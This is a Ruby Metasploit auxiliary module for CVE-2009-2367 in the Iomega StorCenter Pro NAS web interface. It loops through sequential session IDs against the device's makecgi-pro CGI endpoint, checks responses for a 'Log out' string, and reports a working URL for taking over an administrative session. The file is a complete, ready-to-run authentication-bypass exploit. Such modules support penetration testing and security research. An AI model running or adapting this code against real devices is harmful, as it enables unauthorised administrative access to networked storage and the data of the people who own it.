1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8

9
  def initialize
10
    super(
11
      'Name' => 'Iomega StorCenter Pro NAS Web Authentication Bypass',
12
      'Description' => %q{
13
        The Iomega StorCenter Pro Network Attached Storage device web interface increments sessions IDs,
14
        allowing for simple brute force attacks to bypass authentication and gain administrative
15
        access.
16
        },
17
      'References' => [
18
        [ 'OSVDB', '55586' ],
19
        [ 'CVE', '2009-2367' ],
20
      ],
21
      'Author' => [ 'aushack' ],
22
      'License' => MSF_LICENSE,
23
      'Notes' => {
24
        'Stability' => [CRASH_SAFE],
25
        'SideEffects' => [IOC_IN_LOGS],
26
        'Reliability' => []
27
      }
28
    )
29

30
    register_options(
31
      [
32
        OptInt.new('SID_MAX', [true, 'Maximum Session ID', 100])
33
      ]
34
    )
35
  end
36

37
  def run
38
    datastore['SID_MAX'].times do |x|
39
      print_status("Trying session ID #{x}")
40

41
      res = send_request_raw({
42
        'uri' => "/cgi-bin/makecgi-pro?job=show_home&session_id=#{x}",
43
        'method' => 'GET'
44
      }, 25)
45

46
      if res && res.to_s =~ /Log out/
47
        print_status("Found valid session ID number #{x}!")
48
        print_status("Browse to http://#{rhost}:#{rport}/cgi-bin/makecgi-pro?job=show_home&session_id=#{x}")
49
        break
50
      end
51
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
52
      print_error("Unable to connect to #{rhost}:#{rport}")
53
      break
54
    rescue ::Timeout::Error, ::Errno::EPIPE => e
55
      vprint_error(e.message)
56
    end
57
  end
58
end
59

60